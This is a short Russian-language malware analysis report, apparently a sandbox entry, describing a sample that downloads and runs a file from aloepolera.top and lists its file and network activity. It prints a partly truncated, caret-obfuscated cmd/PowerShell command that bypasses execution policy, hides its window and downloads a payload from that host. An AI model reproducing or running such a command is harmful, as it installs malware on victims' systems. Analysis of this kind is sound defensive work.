Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHeLL.ExE -E^x^EC^Utio^NP^OLICy ^bY^PaSS^ ^-nOPROfILE ^-win^DoW^STY^L^e hi^dDEn (^n^Ew^-OBject S^YSteM.N^e^T^.^weB^cLi^eNT^).DOWNl^o^A^DFi^L^E^(^'http://aloepolera...
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHeLL.ExE -E^x^EC^Utio^NP^OLICy ^bY^PaSS^ ^-nOPROfILE ^-win^DoW^STY^L^e hi^dDEn (^n^Ew^-OBject S^YSteM.N^e^T^.^weB^cLi^eNT^).DOWNl^o^A^DFi^L^E^(^'http://aloepolera... (со скрытым окном)
